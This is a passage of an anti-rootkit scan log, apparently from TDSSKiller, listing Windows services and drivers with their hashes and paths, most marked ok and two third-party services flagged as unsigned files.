17:30:40.0134 7020  [ 3C142D31DE9F2F193218A53FE2632051 ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
17:30:40.0169 7020  mrxsmb20 - ok
17:30:40.0213 7020  [ 5C37497276E3B3A5488B23A326A754B7 ] msahci          C:\Windows\system32\DRIVERS\msahci.sys
17:30:40.0231 7020  msahci - ok
17:30:40.0237 7020  [ 8D27B597229AED79430FB9DB3BCBFBD0 ] msdsm          C:\Windows\system32\DRIVERS\msdsm.sys
17:30:40.0259 7020  msdsm - ok
17:30:40.0283 7020  [ DE0ECE52236CFA3ED2DBFC03F28253A8 ] MSDTC          C:\Windows\System32\msdtc.exe
17:30:40.0307 7020  MSDTC - ok
17:30:40.0336 7020  [ AA3FB40E17CE1388FA1BEDAB50EA8F96 ] Msfs            C:\Windows\system32\drivers\Msfs.sys
17:30:40.0384 7020  Msfs - ok
17:30:40.0395 7020  [ F9D215A46A8B9753F61767FA72A20326 ] mshidkmdf      C:\Windows\System32\drivers\mshidkmdf.sys
17:30:40.0449 7020  mshidkmdf - ok
17:30:40.0460 7020  [ D916874BBD4F8B07BFB7FA9B3CCAE29D ] msisadrv        C:\Windows\system32\DRIVERS\msisadrv.sys
17:30:40.0477 7020  msisadrv - ok
17:30:40.0520 7020  [ 808E98FF49B155C522E6400953177B08 ] MSiSCSI        C:\Windows\system32\iscsiexe.dll
17:30:40.0599 7020  MSiSCSI - ok
17:30:40.0603 7020  msiserver - ok
17:30:40.0635 7020  [ 49CCF2C4FEA34FFAD8B1B59D49439366 ] MSKSSRV        C:\Windows\system32\drivers\MSKSSRV.sys
17:30:40.0683 7020  MSKSSRV - ok
17:30:40.0711 7020  [ BDD71ACE35A232104DDD349EE70E1AB3 ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
17:30:40.0775 7020  MSPCLOCK - ok
17:30:40.0779 7020  [ 4ED981241DB27C3383D72092B618A1D0 ] MSPQM          C:\Windows\system32\drivers\MSPQM.sys
17:30:40.0835 7020  MSPQM - ok
17:30:40.0858 7020  [ 89CB141AA8616D8C6A4610FA26C60964 ] MsRPC          C:\Windows\system32\drivers\MsRPC.sys
17:30:40.0884 7020  MsRPC - ok
17:30:40.0895 7020  [ 0EED230E37515A0EAEE3C2E1BC97B288 ] mssmbios        C:\Windows\system32\DRIVERS\mssmbios.sys
17:30:40.0906 7020  mssmbios - ok
17:30:40.0924 7020  [ 2E66F9ECB30B4221A318C92AC2250779 ] MSTEE          C:\Windows\system32\drivers\MSTEE.sys
17:30:40.0977 7020  MSTEE - ok
17:30:40.0982 7020  [ 7EA404308934E675BFFDE8EDF0757BCD ] MTConfig        C:\Windows\system32\DRIVERS\MTConfig.sys
17:30:41.0010 7020  MTConfig - ok
17:30:41.0030 7020  [ F9A18612FD3526FE473C1BDA678D61C8 ] Mup            C:\Windows\system32\Drivers\mup.sys
17:30:41.0049 7020  Mup - ok
17:30:41.0082 7020  [ 4987E079A4530FA737A128BE54B63B12 ] napagent        C:\Windows\system32\qagentRT.dll
17:30:41.0130 7020  napagent - ok
17:30:41.0177 7020  [ 1EA3749C4114DB3E3161156FFFFA6B33 ] NativeWifiP    C:\Windows\system32\DRIVERS\nwifi.sys
17:30:41.0209 7020  NativeWifiP - ok
17:30:41.0239 7020  [ CAD515DBD07D082BB317D9928CE8962C ] NDIS            C:\Windows\system32\drivers\ndis.sys
17:30:41.0266 7020  NDIS - ok
17:30:41.0283 7020  [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC ] NdisCap        C:\Windows\system32\DRIVERS\ndiscap.sys
17:30:41.0337 7020  NdisCap - ok
17:30:41.0367 7020  [ 30639C932D9FEF22B31268FE25A1B6E5 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
17:30:41.0424 7020  NdisTapi - ok
17:30:41.0454 7020  [ F105BA1E22BF1F2EE8F005D4305E4BEC ] Ndisuio        C:\Windows\system32\DRIVERS\ndisuio.sys
17:30:41.0516 7020  Ndisuio - ok
17:30:41.0561 7020  [ 557DFAB9CA1FCB036AC77564C010DAD3 ] NdisWan        C:\Windows\system32\DRIVERS\ndiswan.sys
17:30:41.0613 7020  NdisWan - ok
17:30:41.0618 7020  [ 659B74FB74B86228D6338D643CD3E3CF ] NDProxy        C:\Windows\system32\drivers\NDProxy.sys
17:30:41.0676 7020  NDProxy - ok
17:30:41.0738 7020  [ EE00C544C025958AF50C7B199F3C8595 ] Netaapl        C:\Windows\system32\DRIVERS\netaapl64.sys
17:30:41.0787 7020  Netaapl - ok
17:30:41.0823 7020  [ 86743D9F5D2B1048062B14B1D84501C4 ] NetBIOS        C:\Windows\system32\DRIVERS\netbios.sys
17:30:41.0895 7020  NetBIOS - ok
17:30:41.0918 7020  [ 9162B273A44AB9DCE5B44362731D062A ] NetBT          C:\Windows\system32\DRIVERS\netbt.sys
17:30:41.0985 7020  NetBT - ok
17:30:42.0009 7020  [ 156F6159457D0AA7E59B62681B56EB90 ] Netlogon        C:\Windows\system32\lsass.exe
17:30:42.0023 7020  Netlogon - ok
17:30:42.0086 7020  [ 847D3AE376C0817161A14A82C8922A9E ] Netman          C:\Windows\System32\netman.dll
17:30:42.0191 7020  Netman - ok
17:30:42.0233 7020  [ D22CD77D4F0D63D1169BB35911BFF12D ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
17:30:42.0258 7020  NetMsmqActivator - ok
17:30:42.0264 7020  [ D22CD77D4F0D63D1169BB35911BFF12D ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
17:30:42.0277 7020  NetPipeActivator - ok
17:30:42.0315 7020  [ 5F28111C648F1E24F7DBC87CDEB091B8 ] netprofm        C:\Windows\System32\netprofm.dll
17:30:42.0374 7020  netprofm - ok
17:30:42.0379 7020  [ D22CD77D4F0D63D1169BB35911BFF12D ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
17:30:42.0390 7020  NetTcpActivator - ok
17:30:42.0394 7020  [ D22CD77D4F0D63D1169BB35911BFF12D ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
17:30:42.0406 7020  NetTcpPortSharing - ok
17:30:42.0441 7020  [ 77889813BE4D166CDAB78DDBA990DA92 ] nfrd960        C:\Windows\system32\DRIVERS\nfrd960.sys
17:30:42.0463 7020  nfrd960 - ok
17:30:42.0511 7020  [ D9A0CE66046D6EFA0C61BAA885CBA0A8 ] NlaSvc          C:\Windows\System32\nlasvc.dll
17:30:42.0629 7020  NlaSvc - ok
17:30:42.0658 7020  [ AD42FB061166AF0643806800304BD76F ] NLNdisMP        C:\Windows\system32\DRIVERS\nlndis.sys
17:30:42.0829 7020  NLNdisMP - ok
17:30:42.0840 7020  [ AD42FB061166AF0643806800304BD76F ] NLNdisPT        C:\Windows\system32\DRIVERS\nlndis.sys
17:30:43.0021 7020  NLNdisPT - ok
17:30:43.0082 7020  [ 6988373E38223438B09F0C27D7E67393 ] nlsvc          C:\Program Files\NetLimiter 3\nlsvc.exe
17:30:43.0130 7020  nlsvc ( UnsignedFile.Multi.Generic ) - warning
17:30:43.0130 7020  nlsvc - detected UnsignedFile.Multi.Generic (1)
17:30:43.0142 7020  [ 75E6581DE9A0B155EDAB6807E668BE06 ] nltdi          C:\Program Files\NetLimiter 3\nltdi.sys
17:30:43.0319 7020  nltdi - ok
17:30:43.0348 7020  [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7 ] Npfs            C:\Windows\system32\drivers\Npfs.sys
17:30:43.0436 7020  Npfs - ok
17:30:43.0470 7020  [ D54BFDF3E0C953F823B3D0BFE4732528 ] nsi            C:\Windows\system32\nsisvc.dll
17:30:43.0527 7020  nsi - ok
17:30:43.0547 7020  [ E7F5AE18AF4168178A642A9247C63001 ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
17:30:43.0590 7020  nsiproxy - ok
17:30:43.0664 7020  [ 9A6089B056EA1B83B36424FC9D0A300E ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
17:30:43.0754 7020  Ntfs - ok
17:30:43.0824 7020  [ 5B3CE960C62DBE864BE9A0BD043A3E30 ] NTI IScheduleSvc C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
17:30:43.0871 7020  NTI IScheduleSvc ( UnsignedFile.Multi.Generic ) - warning
17:30:43.0871 7020  NTI IScheduleSvc - detected UnsignedFile.Multi.Generic (1)
17:30:43.0900 7020  [ 64DDD0DEE976302F4BD93E5EFCC2F013 ] NTIDrvr        C:\Windows\system32\drivers\NTIDrvr.sys
17:30:44.0072 7020  NTIDrvr - ok
17:30:44.0102 7020  [ 9899284589F75FA8724FF3D16AED75C1 ] Null            C:\Windows\system32\drivers\Null.sys
17:30:44.0147 7020  Null - ok
17:30:44.0194 7020  [ A4D9C9A608A97F59307C2F2600EDC6A4 ] nvraid          C:\Windows\system32\drivers\nvraid.sys
17:30:44.0229 7020  nvraid - ok
17:30:44.0247 7020  [ 6C1D5F70E7A6A3FD1C90D840EDC048B9 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
17:30:44.0277 7020  nvstor - ok
17:30:44.0317 7020  [ 270D7CD42D6E3979F6DD0146650F0E05 ] nv_agp          C:\Windows\system32\DRIVERS\nv_agp.sys
17:30:44.0362 7020  nv_agp - ok
17:30:44.0379 7020  [ 3589478E4B22CE21B41FA1BFC0B8B8A0 ] ohci1394        C:\Windows\system32\DRIVERS\ohci1394.sys
17:30:44.0420 7020  ohci1394 - ok
17:30:44.0505 7020  [ 4965B005492CBA7719E82B71E3245495 ] ose64          C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
17:30:44.0545 7020  ose64 - ok
17:30:44.0718 7020  [ 61BFFB5F57AD12F83AB64B7181829B34 ] osppsvc        C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
17:30:44.0925 7020  osppsvc - ok
17:30:44.0962 7020  [ 3EAC4455472CC2C97107B5291E0DCAFE ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
17:30:45.0004 7020  p2pimsvc - ok
17:30:45.0027 7020  [ 927463ECB02179F88E4B9A17568C63C3 ] p2psvc          C:\Windows\system32\p2psvc.dll
17:30:45.0078 7020  p2psvc - ok
17:30:45.0095 7020  [ 0086431C29C35BE1DBC43F52CC273887 ] Parport        C:\Windows\system32\DRIVERS\parport.sys
17:30:45.0119 7020  Parport - ok
17:30:45.0157 7020  [ 90061B1ACFE8CCAA5345750FFE08D8B8 ] partmgr        C:\Windows\system32\drivers\partmgr.sys
17:30:45.0180 7020  partmgr - ok
17:30:45.0200 7020  [ 3AEAA8B561E63452C655DC0584922257 ] PcaSvc          C:\Windows\System32\pcasvc.dll
17:30:45.0243 7020  PcaSvc - ok
17:30:45.0269 7020  [ F36F6504009F2FB0DFD1B17A116AD74B ] pci            C:\Windows\system32\DRIVERS\pci.sys
17:30:45.0288 7020  pci - ok
17:30:45.0302 7020  [ B5B8B5EF2E5CB34DF8DCF8831E3534FA ] pciide          C:\Windows\system32\DRIVERS\pciide.sys
17:30:45.0320 7020  pciide - ok
17:30:45.0327 7020  [ B2E81D4E87CE48589F98CB8C05B01F2F ] pcmcia          C:\Windows\system32\DRIVERS\pcmcia.sys
17:30:45.0350 7020  pcmcia - ok
17:30:45.0362 7020  [ D6B9C2E1A11A3A4B26A182FFEF18F603 ] pcw            C:\Windows\system32\drivers\pcw.sys
17:30:45.0380 7020  pcw - ok
17:30:45.0410 7020  [ 68769C3356B3BE5D1C732C97B9A80D6E ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
17:30:45.0517 7020  PEAUTH - ok
17:30:45.0603 7020  [ E495E408C93141E8FC72DC0C6046DDFA ] PerfHost        C:\Windows\SysWow64\perfhost.exe
17:30:45.0654 7020  PerfHost - ok
17:30:45.0723 7020  [ 557E9A86F65F0DE18C9B6751DFE9D3F1 ] pla            C:\Windows\system32\pla.dll
17:30:45.0876 7020  pla - ok
17:30:45.0919 7020  [ 98B1721B8718164293B9701B98C52D77 ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
17:30:45.0939 7020  PlugPlay - ok
17:30:45.0953 7020  [ 7195581CEC9BB7D12ABE54036ACC2E38 ] PNRPAutoReg    C:\Windows\system32\pnrpauto.dll
17:30:45.0983 7020  PNRPAutoReg - ok
17:30:46.0007 7020  [ 3EAC4455472CC2C97107B5291E0DCAFE ] PNRPsvc        C:\Windows\system32\pnrpsvc.dll
17:30:46.0024 7020  PNRPsvc - ok
17:30:46.0059 7020  [ 166EB40D1F5B47E615DE3D0FFFE5F243 ] PolicyAgent    C:\Windows\System32\ipsecsvc.dll
17:30:46.0131 7020  PolicyAgent - ok
17:30:46.0160 7020  [ 6BA9D927DDED70BD1A9CADED45F8B184 ] Power          C:\Windows\system32\umpo.dll
17:30:46.0246 7020  Power - ok
17:30:46.0286 7020  [ 27CC19E81BA5E3403C48302127BDA717 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
17:30:46.0379 7020  PptpMiniport - ok
17:30:46.0392 7020  [ 0D922E23C041EFB1C3FAC2A6F943C9BF ] Processor      C:\Windows\system32\DRIVERS\processr.sys
17:30:46.0422 7020  Processor - ok
17:30:46.0454 7020  [ 97293447431311C06703368AD0F6C4BE ] ProfSvc        C:\Windows\system32\profsvc.dll
17:30:46.0476 7020  ProfSvc - ok
17:30:46.0487 7020  [ 156F6159457D0AA7E59B62681B56EB90 ] ProtectedStorage C:\Windows\system32\lsass.exe
17:30:46.0505 7020  ProtectedStorage - ok
17:30:46.0530 7020  [ EE992183BD8EAEFD9973F352E587A299 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
17:30:46.0574 7020  Psched - ok
17:30:46.0617 7020  [ A53A15A11EBFD21077463EE2C7AFEEF0 ] ql2300          C:\Windows\system32\DRIVERS\ql2300.sys
17:30:46.0742 7020  ql2300 - ok
17:30:46.0758 7020  [ 4F6D12B51DE1AAEFF7DC58C4D75423C8 ] ql40xx          C:\Windows\system32\DRIVERS\ql40xx.sys
17:30:46.0787 7020  ql40xx - ok
17:30:46.0819 7020  [ 906191634E99AEA92C4816150BDA3732 ] QWAVE          C:\Windows\system32\qwave.dll
17:30:46.0880 7020  QWAVE - ok
17:30:46.0894 7020  [ 76707BB36430888D9CE9D705398ADB6C ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
17:30:46.0938 7020  QWAVEdrv - ok
17:30:46.0956 7020  [ 5A0DA8AD5762FA2D91678A8A01311704 ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
17:30:47.0004 7020  RasAcd - ok
17:30:47.0041 7020  [ 7ECFF9B22276B73F43A99A15A6094E90 ] RasAgileVpn    C:\Windows\system32\DRIVERS\AgileVpn.sys
17:30:47.0138 7020  RasAgileVpn - ok
17:30:47.0187 7020  [ 8F26510C5383B8DBE976DE1CD00FC8C7 ] RasAuto        C:\Windows\System32\rasauto.dll
17:30:47.0271 7020  RasAuto - ok
17:30:47.0303 7020  [ 87A6E852A22991580D6D39ADC4790463 ] Rasl2tp        C:\Windows\system32\DRIVERS\rasl2tp.sys
17:30:47.0365 7020  Rasl2tp - ok
17:30:47.0412 7020  [ 47394ED3D16D053F5906EFE5AB51CC83 ] RasMan          C:\Windows\System32\rasmans.dll
17:30:47.0516 7020  RasMan - ok
17:30:47.0539 7020  [ 855C9B1CD4756C5E9A2AA58A15F58C25 ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
17:30:47.0639 7020  RasPppoe - ok
17:30:47.0659 7020  [ E8B1E447B008D07FF47D016C2B0EEECB ] RasSstp        C:\Windows\system32\DRIVERS\rassstp.sys
17:30:47.0725 7020  RasSstp - ok
17:30:47.0758 7020  [ 3BAC8142102C15D59A87757C1D41DCE5 ] rdbss          C:\Windows\system32\DRIVERS\rdbss.sys
17:30:47.0821 7020  rdbss - ok
17:30:47.0840 7020  [ 302DA2A0539F2CF54D7C6CC30C1F2D8D ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
17:30:47.0863 7020  rdpbus - ok
17:30:47.0873 7020  [ CEA6CC257FC9B7715F1C2B4849286D24 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
17:30:47.0916 7020  RDPCDD - ok
17:30:47.0927 7020  [ BB5971A4F00659529A5C44831AF22365 ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
17:30:47.0986 7020  RDPENCDD - ok
17:30:47.0991 7020  [ 216F3FA57533D98E1F74DED70113177A ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
17:30:48.0045 7020  RDPREFMP - ok
17:30:48.0081 7020  [ 447DE7E3DEA39D422C1504F245B668B1 ] RDPWD          C:\Windows\system32\drivers\RDPWD.sys
17:30:48.0138 7020  RDPWD - ok
17:30:48.0184 7020  [ 634B9A2181D98F15941236886164EC8B ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
17:30:48.0226 7020  rdyboost - ok
17:30:48.0250 7020  [ 254FB7A22D74E5511C73A3F6D802F192 ] RemoteAccess    C:\Windows\System32\mprdim.dll
17:30:48.0320 7020  RemoteAccess - ok
17:30:48.0349 7020  [ E4D94F24081440B5FC5AA556C7C62702 ] RemoteRegistry  C:\Windows\system32\regsvc.dll
17:30:48.0418 7020  RemoteRegistry - ok
17:30:48.0459 7020  [ 3DD798846E2C28102B922C56E71B7932 ] RFCOMM          C:\Windows\system32\DRIVERS\rfcomm.sys
17:30:48.0502 7020  RFCOMM - ok
17:30:48.0545 7020  [ E4DC58CF7B3EA515AE917FF0D402A7BB ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
17:30:48.0632 7020  RpcEptMapper - ok
17:30:48.0656 7020  [ D5BA242D4CF8E384DB90E6A8ED850B8C ] RpcLocator      C:\Windows\system32\locator.exe
17:30:48.0685 7020  RpcLocator - ok
17:30:48.0704 7020  [ 7266972E86890E2B30C0C322E906B027 ] RpcSs          C:\Windows\system32\rpcss.dll
17:30:48.0753 7020  RpcSs - ok
17:30:48.0785 7020  [ DDC86E4F8E7456261E637E3552E804FF ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
17:30:48.0849 7020  rspndr - ok
17:30:48.0909 7020  [ 7CB9F0FDD730F4A4ECF6CDE15EA12E8A ] RS_Service      C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
17:30:49.0056 7020  RS_Service - ok
17:30:49.0064 7020  [ 156F6159457D0AA7E59B62681B56EB90 ] SamSs          C:\Windows\system32\lsass.exe
17:30:49.0078 7020  SamSs - ok
17:30:49.0109 7020  [ E3BBB89983DAF5622C1D50CF49F28227 ] sbp2port        C:\Windows\system32\DRIVERS\sbp2port.sys
17:30:49.0130 7020  sbp2port - ok
17:30:49.0159 7020  [ 9B7395789E3791A3B6D000FE6F8B131E ] SCardSvr        C:\Windows\System32\SCardSvr.dll
17:30:49.0245 7020  SCardSvr - ok
17:30:49.0260 7020  [ C94DA20C7E3BA1DCA269BC8460D98387 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
17:30:49.0320 7020  scfilter - ok
17:30:49.0364 7020  [ 624D0F5FF99428BB90A5B8A4123E918E ] Schedule        C:\Windows\system32\schedsvc.dll
17:30:49.0424 7020  Schedule - ok
17:30:49.0449 7020  [ 312E2F82AF11E79906898AC3E3D58A1F ] SCPolicySvc    C:\Windows\System32\certprop.dll
17:30:49.0499 7020  SCPolicySvc - ok
17:30:49.0533 7020  [ 765A27C3279CE11D14CB9E4F5869FCA5 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
17:30:49.0576 7020  SDRSVC - ok
17:30:49.0601 7020  [ 3EA8A16169C26AFBEB544E0E48421186 ] secdrv          C:\Windows\system32\drivers\secdrv.sys
17:30:49.0647 7020  secdrv - ok
17:30:49.0659 7020  [ 463B386EBC70F98DA5DFF85F7E654346 ] seclogon        C:\Windows\system32\seclogon.dll
17:30:49.0717 7020  seclogon - ok
17:30:49.0747 7020  [ C32AB8FA018EF34C0F113BD501436D21 ] SENS            C:\Windows\system32\sens.dll
17:30:49.0799 7020  SENS - ok
17:30:49.0849 7020  [ 0336CFFAFAAB87A11541F1CF1594B2B2 ] SensrSvc        C:\Windows\system32\sensrsvc.dll
17:30:49.0880 7020  SensrSvc - ok
17:30:49.0927 7020  [ CB624C0035412AF0DEBEC78C41F5CA1B ] Serenum        C:\Windows\system32\DRIVERS\serenum.sys
17:30:49.0946 7020  Serenum - ok
17:30:49.0958 7020  [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6 ] Serial          C:\Windows\system32\DRIVERS\serial.sys
17:30:49.0993 7020  Serial - ok
17:30:50.0023 7020  [ 1C545A7D0691CC4A027396535691C3E3 ] sermouse        C:\Windows\system32\DRIVERS\sermouse.sys
17:30:50.0052 7020  sermouse - ok
17:30:50.0088 7020  [ C3BC61CE47FF6F4E88AB8A3B429A36AF ] SessionEnv      C:\Windows\system32\sessenv.dll
17:30:50.0134 7020  SessionEnv - ok
17:30:50.0139 7020  [ A554811BCD09279536440C964AE35BBF ] sffdisk        C:\Windows\system32\DRIVERS\sffdisk.sys
17:30:50.0170 7020  sffdisk - ok
17:30:50.0190 7020  [ FF414F0BAEFEBA59BC6C04B3DB0B87BF ] sffp_mmc        C:\Windows\system32\DRIVERS\sffp_mmc.sys
17:30:50.0218 7020  sffp_mmc - ok
17:30:50.0222 7020  [ 5588B8C6193EB1522490C122EB94DFFA ] sffp_sd        C:\Windows\system32\DRIVERS\sffp_sd.sys
17:30:50.0242 7020  sffp_sd - ok
17:30:50.0248 7020  [ A9D601643A1647211A1EE2EC4E433FF4 ] sfloppy        C:\Windows\system32\DRIVERS\sfloppy.sys
17:30:50.0275 7020  sfloppy - ok
17:30:50.0316 7020  [ B95F6501A2F8B2E78C697FEC401970CE ] SharedAccess    C:\Windows\System32\ipnathlp.dll
17:30:50.0429 7020  SharedAccess - ok
17:30:50.0456 7020  [ 0298AC45D0EFFFB2DB4BAA7DD186E7BF ] ShellHWDetection C:\Windows\System32\shsvcs.dll
17:30:50.0490 7020  ShellHWDetection - ok
17:30:50.0521 7020  [ 843CAF1E5FDE1FFD5FF768F23A51E2E1 ] SiSRaid2        C:\Windows\system32\DRIVERS\SiSRaid2.sys
17:30:50.0538 7020  SiSRaid2 - ok
17:30:50.0557 7020  [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4 ] SiSRaid4        C:\Windows\system32\DRIVERS\sisraid4.sys
17:30:50.0576 7020  SiSRaid4 - ok
17:30:50.0632 7020  [ 50D9949020E02B847CD48F1243FCB895 ] SkypeUpdate    C:\Program Files (x86)\Skype\Updater\Updater.exe
17:30:50.0726 7020  SkypeUpdate - ok
17:30:50.0760 7020  [ 548260A7B8654E024DC30BF8A7C5BAA4 ] Smb            C:\Windows\system32\DRIVERS\smb.sys
17:30:50.0849 7020  Smb - ok
17:30:50.0893 7020  [ 6313F223E817CC09AA41811DAA7F541D ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
17:30:50.0938 7020  SNMPTRAP - ok
17:30:50.0963 7020  [ B9E31E5CACDFE584F34F730A677803F9 ] spldr          C:\Windows\system32\drivers\spldr.sys
17:30:50.0990 7020  spldr - ok
17:30:51.0028 7020  [ 567977DC43CC13C4C35ED7084C0B84D5 ] Spooler        C:\Windows\System32\spoolsv.exe
17:30:51.0060 7020  Spooler - ok
17:30:51.0164 7020  [ 913D843498553A1BC8F8DBAD6358E49F ] sppsvc          C:\Windows\system32\sppsvc.exe
17:30:51.0305 7020  sppsvc - ok
17:30:51.0323 7020  [ 93D7D61317F3D4BC4F4E9F8A96A7DE45 ] sppuinotify    C:\Windows\system32\sppuinotify.dll
17:30:51.0385 7020  sppuinotify - ok
17:30:51.0419 7020  [ 2408C0366D96BCDF63E8F1C78E4A29C5 ] srv            C:\Windows\system32\DRIVERS\srv.sys
17:30:51.0457 7020  srv - ok
17:30:51.0476 7020  [ 76548F7B818881B47D8D1AE1BE9C11F8 ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
17:30:51.0513 7020  srv2 - ok
17:30:51.0543 7020  [ 0AF6E19D39C70844C5CAA8FB0183C36E ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
17:30:51.0576 7020  srvnet - ok
17:30:51.0618 7020  [ 51B52FBD583CDE8AA9BA62B8B4298F33 ] SSDPSRV        C:\Windows\System32\ssdpsrv.dll
17:30:51.0691 7020  SSDPSRV - ok
17:30:51.0702 7020  [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB ] SstpSvc        C:\Windows\system32\sstpsvc.dll
17:30:51.0751 7020  SstpSvc - ok
17:30:51.0773 7020  [ F3817967ED533D08327DC73BC4D5542A ] stexstor        C:\Windows\system32\DRIVERS\stexstor.sys
17:30:51.0806 7020  stexstor - ok
17:30:51.0829 7020  [ DECACB6921DED1A38642642685D77DAC ] StillCam        C:\Windows\system32\DRIVERS\serscan.sys
17:30:51.0867 7020  StillCam - ok
17:30:51.0903 7020  [ 52D0E33B681BD0F33FDC08812FEE4F7D ] stisvc          C:\Windows\System32\wiaservc.dll
17:30:51.0967 7020  stisvc - ok
17:30:51.0985 7020  [ D01EC09B6711A5F8E7E6564A4D0FBC90 ] swenum          C:\Windows\system32\DRIVERS\swenum.sys
17:30:52.0009 7020  swenum - ok
17:30:52.0047 7020  [ E08E46FDD841B7184194011CA1955A0B ] swprv          C:\Windows\System32\swprv.dll
17:30:52.0140 7020  swprv - ok
17:30:52.0183 7020  [ 3C1284516A62078FB68F768DE4F1A7BE ] SysMain        C:\Windows\system32\sysmain.dll
17:30:52.0258 7020  SysMain - ok
17:30:52.0290 7020  [ 238935C3CF2854886DC7CBB2A0E2CC66 ] TabletInputService C:\Windows\System32\TabSvc.dll
17:30:52.0320 7020  TabletInputService - ok
17:30:52.0353 7020  [ 884264AC597B690C5707C89723BB8E7B ] TapiSrv        C:\Windows\System32\tapisrv.dll
17:30:52.0431 7020  TapiSrv - ok
17:30:52.0444 7020  [ 1BE03AC720F4D302EA01D40F588162F6 ] TBS            C:\Windows\System32\tbssvc.dll
17:30:52.0498 7020  TBS - ok
17:30:52.0575 7020  [ 5CFB7AB8F9524D1A1E14369DE63B83CC ] Tcpip          C:\Windows\system32\drivers\tcpip.sys
17:30:52.0662 7020  Tcpip - ok
17:30:52.0701 7020  [ 5CFB7AB8F9524D1A1E14369DE63B83CC ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
17:30:52.0755 7020  TCPIP6 - ok
17:30:52.0793 7020  [ 76D078AF6F587B162D50210F761EB9ED ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
17:30:52.0843 7020  tcpipreg - ok
17:30:52.0859 7020  [ 3371D21011695B16333A3934340C4E7C ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
17:30:52.0909 7020  TDPIPE - ok
17:30:52.0927 7020  [ 7518F7BCFD4B308ABC9192BACAF6C970 ] TDTCP          C:\Windows\system32\drivers\tdtcp.sys
17:30:52.0957 7020  TDTCP - ok
17:30:52.0976 7020  [ 079125C4B17B01FCAEEBCE0BCB290C0F ] tdx            C:\Windows\system32\DRIVERS\tdx.sys
17:30:53.0062 7020  tdx - ok
17:30:53.0086 7020  [ C448651339196C0E869A355171875522 ] TermDD          C:\Windows\system32\DRIVERS\termdd.sys
17:30:53.0106 7020  TermDD - ok
17:30:53.0138 7020  [ 0F05EC2887BFE197AD82A13287D2F404 ] TermService    C:\Windows\System32\termsrv.dll
17:30:53.0210 7020  TermService - ok
17:30:53.0253 7020  [ F0344071948D1A1FA732231785A0664C ] Themes          C:\Windows\system32\themeservice.dll
17:30:53.0270 7020  Themes - ok
17:30:53.0288 7020  [ E40E80D0304A73E8D269F7141D77250B ] THREADORDER    C:\Windows\system32\mmcss.dll
17:30:53.0331 7020  THREADORDER - ok
17:30:53.0351 7020  [ 7E7AFD841694F6AC397E99D75CEAD49D ] TrkWks          C:\Windows\System32\trkwks.dll
17:30:53.0405 7020  TrkWks - ok
17:30:53.0457 7020  [ 840F7FB849F5887A49BA18C13B2DA920 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
17:30:53.0510 7020  TrustedInstaller - ok
17:30:53.0526 7020  [ 61B96C26131E37B24E93327A0BD1FB95 ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
17:30:53.0582 7020  tssecsrv - ok
17:30:53.0623 7020  [ 3836171A2CDF3AF8EF10856DB9835A70 ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
17:30:53.0687 7020  tunnel - ok
17:30:53.0702 7020  [ B4DD609BD7E282BFC683CEC7EAAAAD67 ] uagp35          C:\Windows\system32\DRIVERS\uagp35.sys
17:30:53.0721 7020  uagp35 - ok
17:30:53.0752 7020  [ 2E22C1FD397A5A9FFEF55E9D1FC96C00 ] UBHelper        C:\Windows\system32\drivers\UBHelper.sys
17:30:53.0924 7020  UBHelper - ok
17:30:53.0938 7020  [ D47BAEAD86C65D4F4069D7CE0A4EDCEB ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
17:30:54.0006 7020  udfs - ok
17:30:54.0040 7020  [ 3CBDEC8D06B9968ABA702EBA076364A1 ] UI0Detect      C:\Windows\system32\UI0Detect.exe
17:30:54.0056 7020  UI0Detect - ok
17:30:54.0066 7020  [ 4BFE1BC28391222894CBF1E7D0E42320 ] uliagpkx        C:\Windows\system32\DRIVERS\uliagpkx.sys
17:30:54.0085 7020  uliagpkx - ok
